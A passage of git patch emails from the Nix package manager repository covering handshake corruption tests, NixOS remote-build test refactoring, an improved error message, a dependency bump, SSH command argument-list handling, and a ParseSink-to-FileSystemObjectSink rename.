}); +} + +TEST_F(ServeProtoTest, handshake_client_corrupted_throws) +{ + CharacterizationTest::readTest("handshake-to-client", [&](const std::string toClientLog) { + for (size_t idx = 0; idx < toClientLog.size(); ++idx) { + // corrupt a copy + std::string toClientLogCorrupt = toClientLog; + toClientLogCorrupt[idx] *= 4; + ++toClientLogCorrupt[idx]; + + NullBufferedSink nullSink; + StringSource in { toClientLogCorrupt }; + + if (idx < 4 || idx == 9) { + // magic bytes don't match + EXPECT_THROW( + ServeProto::BasicClientConnection::handshake( + nullSink, in, defaultVersion, "blah"), + Error); + } else if (idx < 8 || idx >= 12) { + // Number out of bounds + EXPECT_THROW( + ServeProto::BasicClientConnection::handshake( + nullSink, in, defaultVersion, "blah"), + SerialisationError); + } else { + auto ver = ServeProto::BasicClientConnection::handshake( + nullSink, in, defaultVersion, "blah"); + EXPECT_NE(ver, defaultVersion); + } + } + }); +} + } From 5167351efbee5c5a7390510eb720c31c6976f4d9 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Mon, 22 Jan 2024 18:44:16 +0100 Subject: [PATCH 331/654] tests/nixos/remote-builds*: Inline module + format --- tests/nixos/remote-builds-ssh-ng.nix | 149 +++++++++++++------------- tests/nixos/remote-builds.nix | 151 +++++++++++++-------------- 2 files changed, 149 insertions(+), 151 deletions(-) diff --git a/tests/nixos/remote-builds-ssh-ng.nix b/tests/nixos/remote-builds-ssh-ng.nix index b9174a788..cca4066f3 100644 --- a/tests/nixos/remote-builds-ssh-ng.nix +++ b/tests/nixos/remote-builds-ssh-ng.nix @@ -28,96 +28,95 @@ let in { - name = lib.mkDefault "remote-builds-ssh-ng"; - - # TODO expand module shorthand syntax instead of use imports - imports = [{ - options = { - builders.config = lib.mkOption { - type = lib.types.deferredModule; - description = '' - Configuration to add to the builder nodes. - ''; - default = { }; - }; + options = { + builders.config = lib.mkOption { + type = lib.types.deferredModule; + description = '' + Configuration to add to the builder nodes. + ''; + default = { }; }; - }]; + }; - nodes = - { builder = - { config, pkgs, ... }: - { - imports = [ test.config.builders.config ]; - services.openssh.enable = true; - virtualisation.writableStore = true; - nix.settings.sandbox = true; - nix.settings.substituters = lib.mkForce [ ]; - }; + config = { + name = lib.mkDefault "remote-builds-ssh-ng"; - client = - { config, lib, pkgs, ... }: - { nix.settings.max-jobs = 0; # force remote building - nix.distributedBuilds = true; - nix.buildMachines = - [ { hostName = "builder"; - sshUser = "root"; - sshKey = "/root/.ssh/id_ed25519"; - system = "i686-linux"; - maxJobs = 1; - protocol = "ssh-ng"; - } - ]; + nodes = + { builder = + { config, pkgs, ... }: + { + imports = [ test.config.builders.config ]; + services.openssh.enable = true; virtualisation.writableStore = true; - virtualisation.additionalPaths = [ config.system.build.extraUtils ]; + nix.settings.sandbox = true; nix.settings.substituters = lib.mkForce [ ]; - programs.ssh.extraConfig = "ConnectTimeout 30"; }; - }; - testScript = { nodes }: '' - # fmt: off - import subprocess + client = + { config, lib, pkgs, ... }: + { nix.settings.max-jobs = 0; # force remote building + nix.distributedBuilds = true; + nix.buildMachines = + [ { hostName = "builder"; + sshUser = "root"; + sshKey = "/root/.ssh/id_ed25519"; + system = "i686-linux"; + maxJobs = 1; + protocol = "ssh-ng"; + } + ]; + virtualisation.writableStore = true; + virtualisation.additionalPaths = [ config.system.build.extraUtils ]; + nix.settings.substituters = lib.mkForce [ ]; + programs.ssh.extraConfig = "ConnectTimeout 30"; + }; + }; - start_all() + testScript = { nodes }: '' + # fmt: off + import subprocess - # Create an SSH key on the client. - subprocess.run([ - "${hostPkgs.openssh}/bin/ssh-keygen", "-t", "ed25519", "-f", "key", "-N", "" - ], capture_output=True, check=True) - client.succeed("mkdir -p -m 700 /root/.ssh") - client.copy_from_host("key", "/root/.ssh/id_ed25519") - client.succeed("chmod 600 /root/.ssh/id_ed25519") + start_all() - # Install the SSH key on the builder. - client.wait_for_unit("network.target") - builder.succeed("mkdir -p -m 700 /root/.ssh") - builder.copy_from_host("key.pub", "/root/.ssh/authorized_keys") - builder.wait_for_unit("sshd") - client.succeed(f"ssh -o StrictHostKeyChecking=no {builder.name} 'echo hello world'") + # Create an SSH key on the client. + subprocess.run([ + "${hostPkgs.openssh}/bin/ssh-keygen", "-t", "ed25519", "-f", "key", "-N", "" + ], capture_output=True, check=True) + client.succeed("mkdir -p -m 700 /root/.ssh") + client.copy_from_host("key", "/root/.ssh/id_ed25519") + client.succeed("chmod 600 /root/.ssh/id_ed25519") - # Perform a build - out = client.succeed("nix-build ${expr nodes.client 1} 2> build-output") + # Install the SSH key on the builder. + client.wait_for_unit("network.target") + builder.succeed("mkdir -p -m 700 /root/.ssh") + builder.copy_from_host("key.pub", "/root/.ssh/authorized_keys") + builder.wait_for_unit("sshd") + client.succeed(f"ssh -o StrictHostKeyChecking=no {builder.name} 'echo hello world'") - # Verify that the build was done on the builder - builder.succeed(f"test -e {out.strip()}") + # Perform a build + out = client.succeed("nix-build ${expr nodes.client 1} 2> build-output") - # Print the build log, prefix the log lines to avoid nix intercepting lines starting with @nix - buildOutput = client.succeed("sed -e 's/^/build-output:/' build-output") - print(buildOutput) + # Verify that the build was done on the builder + builder.succeed(f"test -e {out.strip()}") - # Make sure that we get the expected build output - client.succeed("grep -qF Hello build-output") + # Print the build log, prefix the log lines to avoid nix intercepting lines starting with @nix + buildOutput = client.succeed("sed -e 's/^/build-output:/' build-output") + print(buildOutput) - # We don't want phase reporting in the build output - client.fail("grep -qF '@nix' build-output") + # Make sure that we get the expected build output + client.succeed("grep -qF Hello build-output") - # Get the log file - client.succeed(f"nix-store --read-log {out.strip()} > log-output") - # Prefix the log lines to avoid nix intercepting lines starting with @nix - logOutput = client.succeed("sed -e 's/^/log-file:/' log-output") - print(logOutput) + # We don't want phase reporting in the build output + client.fail("grep -qF '@nix' build-output") - # Check that we get phase reporting in the log file - client.succeed("grep -q '@nix {\"action\":\"setPhase\",\"phase\":\"buildPhase\"}' log-output") - ''; + # Get the log file + client.succeed(f"nix-store --read-log {out.strip()} > log-output") + # Prefix the log lines to avoid nix intercepting lines starting with @nix + logOutput = client.succeed("sed -e 's/^/log-file:/' log-output") + print(logOutput) + + # Check that we get phase reporting in the log file + client.succeed("grep -q '@nix {\"action\":\"setPhase\",\"phase\":\"buildPhase\"}' log-output") + ''; + }; } diff --git a/tests/nixos/remote-builds.nix b/tests/nixos/remote-builds.nix index 6f9b0ebf0..423b9d171 100644 --- a/tests/nixos/remote-builds.nix +++ b/tests/nixos/remote-builds.nix @@ -37,90 +37,89 @@ let in { - name = lib.mkDefault "remote-builds"; + options = { + builders.config = lib.mkOption { + type = lib.types.deferredModule; + description = '' + Configuration to add to the builder nodes. + ''; + default = { }; + }; + }; - # TODO expand module shorthand syntax instead of use imports - imports = [{ - options = { - builders.config = lib.mkOption { - type = lib.types.deferredModule; - description = '' - Configuration to add to the builder nodes. - ''; - default = { }; + config = { + name = lib.mkDefault "remote-builds"; + + nodes = + { builder1 = builder; + builder2 = builder; + + client = + { config, lib, pkgs, ... }: + { nix.settings.max-jobs = 0; # force remote building + nix.distributedBuilds = true; + nix.buildMachines = + [ { hostName = "builder1"; + sshUser = "root"; + sshKey = "/root/.ssh/id_ed25519"; + system = "i686-linux"; + maxJobs = 1; + } + { hostName = "builder2"; + sshUser = "root"; + sshKey = "/root/.ssh/id_ed25519"; + system = "i686-linux"; + maxJobs = 1; + } + ]; + virtualisation.writableStore = true; + virtualisation.additionalPaths = [ config.system.build.extraUtils ]; + nix.settings.substituters = lib.mkForce [ ]; + programs.ssh.extraConfig = "ConnectTimeout 30"; + }; }; - }; - }]; - nodes = - { builder1 = builder; - builder2 = builder; + testScript = { nodes }: '' + # fmt: off + import subprocess - client = - { config, lib, pkgs, ... }: - { nix.settings.max-jobs = 0; # force remote building - nix.distributedBuilds = true; - nix.buildMachines = - [ { hostName = "builder1"; - sshUser = "root"; - sshKey = "/root/.ssh/id_ed25519"; - system = "i686-linux"; - maxJobs = 1; - } - { hostName = "builder2"; - sshUser = "root"; - sshKey = "/root/.ssh/id_ed25519"; - system = "i686-linux"; - maxJobs = 1; - } - ]; - virtualisation.writableStore = true; - virtualisation.additionalPaths = [ config.system.build.extraUtils ]; - nix.settings.substituters = lib.mkForce [ ]; - programs.ssh.extraConfig = "ConnectTimeout 30"; - }; - }; + start_all() - testScript = { nodes }: '' - # fmt: off - import subprocess + # Create an SSH key on the client. + subprocess.run([ + "${hostPkgs.openssh}/bin/ssh-keygen", "-t", "ed25519", "-f", "key", "-N", "" + ], capture_output=True, check=True) + client.succeed("mkdir -p -m 700 /root/.ssh") + client.copy_from_host("key", "/root/.ssh/id_ed25519") + client.succeed("chmod 600 /root/.ssh/id_ed25519") - start_all() + # Install the SSH key on the builders. + client.wait_for_unit("network.target") + for builder in [builder1, builder2]: + builder.succeed("mkdir -p -m 700 /root/.ssh") + builder.copy_from_host("key.pub", "/root/.ssh/authorized_keys") + builder.wait_for_unit("sshd") + client.succeed(f"ssh -o StrictHostKeyChecking=no {builder.name} 'echo hello world'") - # Create an SSH key on the client. - subprocess.run([ - "${hostPkgs.openssh}/bin/ssh-keygen", "-t", "ed25519", "-f", "key", "-N", "" - ], capture_output=True, check=True) - client.succeed("mkdir -p -m 700 /root/.ssh") - client.copy_from_host("key", "/root/.ssh/id_ed25519") - client.succeed("chmod 600 /root/.ssh/id_ed25519") + # Perform a build and check that it was performed on the builder. + out = client.succeed( + "nix-build ${expr nodes.client 1} 2> build-output", + "grep -q Hello build-output" + ) + builder1.succeed(f"test -e {out}") - # Install the SSH key on the builders. - client.wait_for_unit("network.target") - for builder in [builder1, builder2]: - builder.succeed("mkdir -p -m 700 /root/.ssh") - builder.copy_from_host("key.pub", "/root/.ssh/authorized_keys") - builder.wait_for_unit("sshd") - client.succeed(f"ssh -o StrictHostKeyChecking=no {builder.name} 'echo hello world'") + # And a parallel build. + paths = client.succeed(r'nix-store -r $(nix-instantiate ${expr nodes.client 2})\!out $(nix-instantiate ${expr nodes.client 3})\!out') + out1, out2 = paths.split() + builder1.succeed(f"test -e {out1} -o -e {out2}") + builder2.succeed(f"test -e {out1} -o -e {out2}") - # Perform a build and check that it was performed on the builder. - out = client.succeed( - "nix-build ${expr nodes.client 1} 2> build-output", - "grep -q Hello build-output" - ) - builder1.succeed(f"test -e {out}") + # And a failing build. + client.fail("nix-build ${expr nodes.client 5}") - # And a parallel build. - paths = client.succeed(r'nix-store -r $(nix-instantiate ${expr nodes.client 2})\!out $(nix-instantiate ${expr nodes.client 3})\!out') - out1, out2 = paths.split() - builder1.succeed(f"test -e {out1} -o -e {out2}") - builder2.succeed(f"test -e {out1} -o -e {out2}") - - # And a failing build. - client.fail("nix-build ${expr nodes.client 5}") - - # Test whether the build hook automatically skips unavailable builders. - builder1.block() - client.succeed("nix-build ${expr nodes.client 4}") - ''; + # Test whether the build hook automatically skips unavailable builders. + builder1.block() + client.succeed("nix-build ${expr nodes.client 4}") + ''; + }; } From c4d7c4a8485cb74f57045d1fa14c1d5f9fa28310 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Mon, 22 Jan 2024 18:47:59 +0100 Subject: [PATCH 332/654] nixos/tests/remote-builds*: Format nixpkgs-fmt --- tests/nixos/remote-builds-ssh-ng.nix | 38 +++++++++++++++------------- tests/nixos/remote-builds.nix | 13 +++++++--- 2 files changed, 29 insertions(+), 22 deletions(-) diff --git a/tests/nixos/remote-builds-ssh-ng.nix b/tests/nixos/remote-builds-ssh-ng.nix index cca4066f3..926ec00fe 100644 --- a/tests/nixos/remote-builds-ssh-ng.nix +++ b/tests/nixos/remote-builds-ssh-ng.nix @@ -42,29 +42,31 @@ in name = lib.mkDefault "remote-builds-ssh-ng"; nodes = - { builder = - { config, pkgs, ... }: - { - imports = [ test.config.builders.config ]; - services.openssh.enable = true; - virtualisation.writableStore = true; - nix.settings.sandbox = true; - nix.settings.substituters = lib.mkForce [ ]; - }; + { + builder = + { config, pkgs, ... }: + { + imports = [ test.config.builders.config ]; + services.openssh.enable = true; + virtualisation.writableStore = true; + nix.settings.sandbox = true; + nix.settings.substituters = lib.mkForce [ ]; + }; client = { config, lib, pkgs, ... }: - { nix.settings.max-jobs = 0; # force remote building + { + nix.settings.max-jobs = 0; # force remote building nix.distributedBuilds = true; nix.buildMachines = - [ { hostName = "builder"; - sshUser = "root"; - sshKey = "/root/.ssh/id_ed25519"; - system = "i686-linux"; - maxJobs = 1; - protocol = "ssh-ng"; - } - ]; + [{ + hostName = "builder"; + sshUser = "root"; + sshKey = "/root/.ssh/id_ed25519"; + system = "i686-linux"; + maxJobs = 1; + protocol = "ssh-ng"; + }]; virtualisation.writableStore = true; virtualisation.additionalPaths = [ config.system.build.extraUtils ]; nix.settings.substituters = lib.mkForce [ ]; diff --git a/tests/nixos/remote-builds.nix b/tests/nixos/remote-builds.nix index 423b9d171..1661203ec 100644 --- a/tests/nixos/remote-builds.nix +++ b/tests/nixos/remote-builds.nix @@ -51,21 +51,26 @@ in name = lib.mkDefault "remote-builds"; nodes = - { builder1 = builder; + { + builder1 = builder; builder2 = builder; client = { config, lib, pkgs, ... }: - { nix.settings.max-jobs = 0; # force remote building + { + nix.settings.max-jobs = 0; # force remote building nix.distributedBuilds = true; nix.buildMachines = - [ { hostName = "builder1"; + [ + { + hostName = "builder1"; sshUser = "root"; sshKey = "/root/.ssh/id_ed25519"; system = "i686-linux"; maxJobs = 1; } - { hostName = "builder2"; + { + hostName = "builder2"; sshUser = "root"; sshKey = "/root/.ssh/id_ed25519"; system = "i686-linux"; From 81499a0b93a136f889f3799d7110dcc479a4cbe1 Mon Sep 17 00:00:00 2001 From: Maximilian Bosch Date: Sat, 20 Jan 2024 16:05:30 +0100 Subject: [PATCH 333/654] libexpr: print value of what is attempted to be called as function MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Low-hanging fruit in the spirit of #9753 and #9754 (means 9999years did all the hard work already). This basically prints out what was attempted to be called as function, i.e. map (import {}) [ 1 2 3 ] now gives the following error message: error: … while calling the 'map' builtin at «string»:1:1: 1| map (import {}) [ 1 2 3 ] | ^ … while evaluating the first argument passed to builtins.map error: expected a function but found a set: { _type = "pkgs"; AAAAAASomeThingsFailToEvaluate = «thunk»; AMB-plugins = «thunk»; ArchiSteamFarm = «thunk»; BeatSaberModManager = «thunk»; CHOWTapeModel = «thunk»; ChowCentaur = «thunk»; ChowKick = «thunk»; ChowPhaser = «thunk»; CoinMP = «thunk»; «18783 attributes elided»} --- src/libexpr/eval.cc | 6 +++++- tests/unit/libexpr/error_traces.cc | 4 ++-- 2 files changed, 7 insertions(+), 3 deletions(-) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 71e956e10..ce410162e 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -1692,7 +1692,11 @@ void EvalState::callFunction(Value & fun, size_t nrArgs, Value * * args, Value & } else - error("attempt to call something which is not a function but %1%", showType(vCur)).atPos(pos).debugThrow(); + error("attempt to call something which is not a function but %1%: %2%", + showType(vCur), + ValuePrinter(*this, vCur, errorPrintOptions)) + .atPos(pos) + .debugThrow(); } vRes = vCur; diff --git a/tests/unit/libexpr/error_traces.cc b/tests/unit/libexpr/error_traces.cc index f0cad58bb..f99aafd74 100644 --- a/tests/unit/libexpr/error_traces.cc +++ b/tests/unit/libexpr/error_traces.cc @@ -750,7 +750,7 @@ namespace nix { ASSERT_TRACE1("foldl' (_: 1) \"foo\" [ true ]", TypeError, - hintfmt("attempt to call something which is not a function but %s", "an integer")); + hintfmt("attempt to call something which is not a function but %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL)); ASSERT_TRACE2("foldl' (a: b: a && b) \"foo\" [ true ]", TypeError, @@ -835,7 +835,7 @@ namespace nix { ASSERT_TRACE1("sort (_: 1) [ \"foo\" \"bar\" ]", TypeError, - hintfmt("attempt to call something which is not a function but %s", "an integer")); + hintfmt("attempt to call something which is not a function but %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL)); ASSERT_TRACE2("sort (_: _: 1) [ \"foo\" \"bar\" ]", TypeError, From 9a51209309891f8bf7edf65673682df13d4beb90 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 22 Jan 2024 22:40:01 +0000 Subject: [PATCH 334/654] build(deps): bump zeebe-io/backport-action from 2.3.0 to 2.4.0 Bumps [zeebe-io/backport-action](https://github.com/zeebe-io/backport-action) from 2.3.0 to 2.4.0. - [Release notes](https://github.com/zeebe-io/backport-action/releases) - [Commits](https://github.com/zeebe-io/backport-action/compare/v2.3.0...v2.4.0) --- updated-dependencies: - dependency-name: zeebe-io/backport-action dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] --- .github/workflows/backport.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/backport.yml b/.github/workflows/backport.yml index f003114ba..46a4529c1 100644 --- a/.github/workflows/backport.yml +++ b/.github/workflows/backport.yml @@ -21,7 +21,7 @@ jobs: fetch-depth: 0 - name: Create backport PRs # should be kept in sync with `version` - uses: zeebe-io/backport-action@v2.3.0 + uses: zeebe-io/backport-action@v2.4.0 with: # Config README: https://github.com/zeebe-io/backport-action#backport-action github_token: ${{ secrets.GITHUB_TOKEN }} From b71673109c2172cb1f933cc8a97c26b4352ac239 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Mon, 22 Jan 2024 15:50:00 -0500 Subject: [PATCH 335/654] Make `SSHMaster::startCommand` work on an args list This avoids split-on-whitespace errors: - No more `bash -c` needed - No more `shellEscape` needed - `remote-program` ssh store setting also cleanly supports args (e.g. `nix daemon`) - `ssh` uses `--` to separate args for SSH from args for the command to run. and will help with Hydra dedup. Some code taken from #6628. Co-Authored-By: Alexander Bantyev --- src/libstore/legacy-ssh-store.cc | 11 ++++++++--- src/libstore/legacy-ssh-store.hh | 2 +- src/libstore/ssh-store.cc | 19 ++++++++++--------- src/libstore/ssh.cc | 12 +++++++----- src/libstore/ssh.hh | 11 ++++++++++- 5 files changed, 36 insertions(+), 19 deletions(-) diff --git a/src/libstore/legacy-ssh-store.cc b/src/libstore/legacy-ssh-store.cc index 4f020c452..e422adeec 100644 --- a/src/libstore/legacy-ssh-store.cc +++ b/src/libstore/legacy-ssh-store.cc @@ -55,9 +55,14 @@ LegacySSHStore::LegacySSHStore(const std::string & scheme, const std::string & h ref LegacySSHStore::openConnection() { auto conn = make_ref(); - conn->sshConn = master.startCommand( - fmt("%s --serve --write", remoteProgram) - + (remoteStore.get() == "" ? "" : " --store " + shellEscape(remoteStore.get()))); + Strings command = remoteProgram.get(); + command.push_back("--serve"); + command.push_back("--write"); + if (remoteStore.get() != "") { + command.push_back("--store"); + command.push_back(remoteStore.get()); + } + conn->sshConn = master.startCommand(std::move(command)); conn->to = FdSink(conn->sshConn->in.get()); conn->from = FdSource(conn->sshConn->out.get()); diff --git a/src/libstore/legacy-ssh-store.hh b/src/libstore/legacy-ssh-store.hh index bdf79eab3..ae890177b 100644 --- a/src/libstore/legacy-ssh-store.hh +++ b/src/libstore/legacy-ssh-store.hh @@ -13,7 +13,7 @@ struct LegacySSHStoreConfig : virtual CommonSSHStoreConfig { using CommonSSHStoreConfig::CommonSSHStoreConfig; - const Setting remoteProgram{this, "nix-store", "remote-program", + const Setting remoteProgram{this, {"nix-store"}, "remote-program", "Path to the `nix-store` executable on the remote machine."}; const Setting maxConnections{this, 1, "max-connections", diff --git a/src/libstore/ssh-store.cc b/src/libstore/ssh-store.cc index d4c8ab5b2..0cf92b114 100644 --- a/src/libstore/ssh-store.cc +++ b/src/libstore/ssh-store.cc @@ -17,7 +17,7 @@ struct SSHStoreConfig : virtual RemoteStoreConfig, virtual CommonSSHStoreConfig using RemoteStoreConfig::RemoteStoreConfig; using CommonSSHStoreConfig::CommonSSHStoreConfig; - const Setting remoteProgram{this, "nix-daemon", "remote-program", + const Setting remoteProgram{this, {"nix-daemon"}, "remote-program", "Path to the `nix-daemon` executable on the remote machine."}; const std::string name() override { return "Experimental SSH Store"; } @@ -212,14 +212,15 @@ public: ref SSHStore::openConnection() { auto conn = make_ref(); - - std::string command = remoteProgram + " --stdio"; - if (remoteStore.get() != "") - command += " --store " + shellEscape(remoteStore.get()); - for (auto & arg : extraRemoteProgramArgs) - command += " " + shellEscape(arg); - - conn->sshConn = master.startCommand(command); + Strings command = remoteProgram.get(); + command.push_back("--stdio"); + if (remoteStore.get() != "") { + command.push_back("--store"); + command.push_back(remoteStore.get()); + } + command.insert(command.end(), + extraRemoteProgramArgs.begin(), extraRemoteProgramArgs.end()); + conn->sshConn = master.startCommand(std::move(command)); conn->to = FdSink(conn->sshConn->in.get()); conn->from = FdSource(conn->sshConn->out.get()); return conn; diff --git a/src/libstore/ssh.cc b/src/libstore/ssh.cc index 5c8d6a504..30fe73adb 100644 --- a/src/libstore/ssh.cc +++ b/src/libstore/ssh.cc @@ -52,7 +52,8 @@ bool SSHMaster::isMasterRunning() { return res.first == 0; } -std::unique_ptr SSHMaster::startCommand(const std::string & command) +std::unique_ptr SSHMaster::startCommand( + Strings && command, Strings && extraSshArgs) { Path socketPath = startMaster(); @@ -84,18 +85,19 @@ std::unique_ptr SSHMaster::startCommand(const std::string Strings args; - if (fakeSSH) { - args = { "bash", "-c" }; - } else { + if (!fakeSSH) { args = { "ssh", host.c_str(), "-x" }; addCommonSSHOpts(args); if (socketPath != "") args.insert(args.end(), {"-S", socketPath}); if (verbosity >= lvlChatty) args.push_back("-v"); + args.splice(args.end(), std::move(extraSshArgs)); + args.push_back("--"); } - args.push_back(command); + args.splice(args.end(), std::move(command)); + execvp(args.begin()->c_str(), stringsToCharPtrs(args).data()); // could not exec ssh/bash diff --git a/src/libstore/ssh.hh b/src/libstore/ssh.hh index bfcd6f21c..08bb43dfa 100644 --- a/src/libstore/ssh.hh +++ b/src/libstore/ssh.hh @@ -41,7 +41,16 @@ public: AutoCloseFD out, in; }; - std::unique_ptr startCommand(const std::string & command); + /** + * @param command The command (arg vector) to execute. + * + * @param extraSShArgs Extra args to pass to SSH (not the command to + * execute). Will not be used when "fake SSHing" to the local + * machine. + */ + std::unique_ptr startCommand( + Strings && command, + Strings && extraSshArgs = {}); Path startMaster(); }; From 966d6fcd01cfd33e9954e5df262b8bf64a5fd311 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Mon, 22 Jan 2024 17:59:34 -0500 Subject: [PATCH 336/654] `ParseSink` -> `FileSystemObjectSink` Co-authored-by: Robert Hensing --- src/libstore/daemon.cc | 4 ++-- src/libstore/export-import.cc | 2 +- src/libstore/local-store.cc | 2 +- src/libstore/nar-accessor.cc | 2 +- src/libstore/store-api.cc | 8 ++++---- src/libutil/archive.cc | 8 ++++---- src/libutil/archive.hh | 2 +- src/libutil/file-content-address.hh | 2 +- src/libutil/fs-sink.cc | 2 +- src/libutil/fs-sink.hh | 10 +++++----- src/libutil/git.cc | 4 ++-- src/libutil/git.hh | 4 ++-- src/libutil/memory-source-accessor.hh | 2 +- tests/unit/libutil/git.cc | 2 +- 14 files changed, 27 insertions(+), 27 deletions(-) diff --git a/src/libstore/daemon.cc b/src/libstore/daemon.cc index 923ea6447..27ad14ed4 100644 --- a/src/libstore/daemon.cc +++ b/src/libstore/daemon.cc @@ -441,7 +441,7 @@ static void performOp(TunnelLogger * logger, ref store, eagerly consume the entire stream it's given, past the length of the Nar. */ TeeSource savedNARSource(from, saved); - NullParseSink sink; /* just parse the NAR */ + NullFileSystemObjectSink sink; /* just parse the NAR */ parseDump(sink, savedNARSource); } else { /* Incrementally parse the NAR file, stripping the @@ -913,7 +913,7 @@ static void performOp(TunnelLogger * logger, ref store, source = std::make_unique(from, to); else { TeeSource tee { from, saved }; - NullParseSink ether; + NullFileSystemObjectSink ether; parseDump(ether, tee); source = std::make_unique(saved.s); } diff --git a/src/libstore/export-import.cc b/src/libstore/export-import.cc index d57b25bd7..cb36c0c1b 100644 --- a/src/libstore/export-import.cc +++ b/src/libstore/export-import.cc @@ -65,7 +65,7 @@ StorePaths Store::importPaths(Source & source, CheckSigsFlag checkSigs) /* Extract the NAR from the source. */ StringSink saved; TeeSource tee { source, saved }; - NullParseSink ether; + NullFileSystemObjectSink ether; parseDump(ether, tee); uint32_t magic = readInt(source); diff --git a/src/libstore/local-store.cc b/src/libstore/local-store.cc index 07068f8f8..2c22bfe31 100644 --- a/src/libstore/local-store.cc +++ b/src/libstore/local-store.cc @@ -1048,7 +1048,7 @@ void LocalStore::addToStore(const ValidPathInfo & info, Source & source, bool narRead = false; Finally cleanup = [&]() { if (!narRead) { - NullParseSink sink; + NullFileSystemObjectSink sink; try { parseDump(sink, source); } catch (...) { diff --git a/src/libstore/nar-accessor.cc b/src/libstore/nar-accessor.cc index 15b05fe25..4bc68a5ae 100644 --- a/src/libstore/nar-accessor.cc +++ b/src/libstore/nar-accessor.cc @@ -27,7 +27,7 @@ struct NarAccessor : public SourceAccessor NarMember root; - struct NarIndexer : ParseSink, Source + struct NarIndexer : FileSystemObjectSink, Source { NarAccessor & acc; Source & source; diff --git a/src/libstore/store-api.cc b/src/libstore/store-api.cc index c913a97dc..439c9530c 100644 --- a/src/libstore/store-api.cc +++ b/src/libstore/store-api.cc @@ -424,12 +424,12 @@ ValidPathInfo Store::addToStoreSlow( information to narSink. */ TeeSource tapped { *fileSource, narSink }; - NullParseSink blank; + NullFileSystemObjectSink blank; auto & parseSink = method.getFileIngestionMethod() == FileIngestionMethod::Flat - ? (ParseSink &) fileSink + ? (FileSystemObjectSink &) fileSink : method.getFileIngestionMethod() == FileIngestionMethod::Recursive - ? (ParseSink &) blank - : (abort(), (ParseSink &)*(ParseSink *)nullptr); // handled both cases + ? (FileSystemObjectSink &) blank + : (abort(), (FileSystemObjectSink &)*(FileSystemObjectSink *)nullptr); // handled both cases /* The information that flows from tapped (besides being replicated in narSink), is now put in parseSink. */ diff --git a/src/libutil/archive.cc b/src/libutil/archive.cc index 712ea51c7..17886dd19 100644 --- a/src/libutil/archive.cc +++ b/src/libutil/archive.cc @@ -133,7 +133,7 @@ static SerialisationError badArchive(const std::string & s) } -static void parseContents(ParseSink & sink, Source & source, const Path & path) +static void parseContents(FileSystemObjectSink & sink, Source & source, const Path & path) { uint64_t size = readLongLong(source); @@ -164,7 +164,7 @@ struct CaseInsensitiveCompare }; -static void parse(ParseSink & sink, Source & source, const Path & path) +static void parse(FileSystemObjectSink & sink, Source & source, const Path & path) { std::string s; @@ -266,7 +266,7 @@ static void parse(ParseSink & sink, Source & source, const Path & path) } -void parseDump(ParseSink & sink, Source & source) +void parseDump(FileSystemObjectSink & sink, Source & source) { std::string version; try { @@ -294,7 +294,7 @@ void copyNAR(Source & source, Sink & sink) // FIXME: if 'source' is the output of dumpPath() followed by EOF, // we should just forward all data directly without parsing. - NullParseSink parseSink; /* just parse the NAR */ + NullFileSystemObjectSink parseSink; /* just parse the NAR */ TeeSource wrapper { source, sink }; diff --git a/src/libutil/archive.hh b/src/libutil/archive.hh index 2cf8ee891..28c63bb85 100644 --- a/src/libutil/archive.hh +++ b/src/libutil/archive.hh @@ -73,7 +73,7 @@ time_t dumpPathAndGetMtime(const Path & path, Sink & sink, */ void dumpString(std::string_view s, Sink & sink); -void parseDump(ParseSink & sink, Source & source); +void parseDump(FileSystemObjectSink & sink, Source & source); void restorePath(const Path & path, Source & source); diff --git a/src/libutil/file-content-address.hh b/src/libutil/file-content-address.hh index 8e93f5847..7f7544e41 100644 --- a/src/libutil/file-content-address.hh +++ b/src/libutil/file-content-address.hh @@ -35,7 +35,7 @@ void dumpPath( /** * Restore a serialization of the given file system object. * - * @TODO use an arbitrary `ParseSink`. + * @TODO use an arbitrary `FileSystemObjectSink`. */ void restorePath( const Path & path, diff --git a/src/libutil/fs-sink.cc b/src/libutil/fs-sink.cc index 925e6f05d..bf44de92d 100644 --- a/src/libutil/fs-sink.cc +++ b/src/libutil/fs-sink.cc @@ -7,7 +7,7 @@ namespace nix { void copyRecursive( SourceAccessor & accessor, const CanonPath & from, - ParseSink & sink, const Path & to) + FileSystemObjectSink & sink, const Path & to) { auto stat = accessor.lstat(from); diff --git a/src/libutil/fs-sink.hh b/src/libutil/fs-sink.hh index bf54b7301..f4c4e92f1 100644 --- a/src/libutil/fs-sink.hh +++ b/src/libutil/fs-sink.hh @@ -11,7 +11,7 @@ namespace nix { /** * \todo Fix this API, it sucks. */ -struct ParseSink +struct FileSystemObjectSink { virtual void createDirectory(const Path & path) = 0; @@ -33,12 +33,12 @@ struct ParseSink */ void copyRecursive( SourceAccessor & accessor, const CanonPath & sourcePath, - ParseSink & sink, const Path & destPath); + FileSystemObjectSink & sink, const Path & destPath); /** * Ignore everything and do nothing */ -struct NullParseSink : ParseSink +struct NullFileSystemObjectSink : FileSystemObjectSink { void createDirectory(const Path & path) override { } void receiveContents(std::string_view data) override { } @@ -51,7 +51,7 @@ struct NullParseSink : ParseSink /** * Write files at the given path */ -struct RestoreSink : ParseSink +struct RestoreSink : FileSystemObjectSink { Path dstPath; @@ -75,7 +75,7 @@ private: * `receiveContents` to the underlying `Sink`. For anything but a single * file, set `regular = true` so the caller can fail accordingly. */ -struct RegularFileSink : ParseSink +struct RegularFileSink : FileSystemObjectSink { bool regular = true; Sink & sink; diff --git a/src/libutil/git.cc b/src/libutil/git.cc index 296b75628..058384db0 100644 --- a/src/libutil/git.cc +++ b/src/libutil/git.cc @@ -54,7 +54,7 @@ static std::string getString(Source & source, int n) void parse( - ParseSink & sink, + FileSystemObjectSink & sink, const Path & sinkPath, Source & source, std::function hook, @@ -133,7 +133,7 @@ std::optional convertMode(SourceAccessor::Type type) } -void 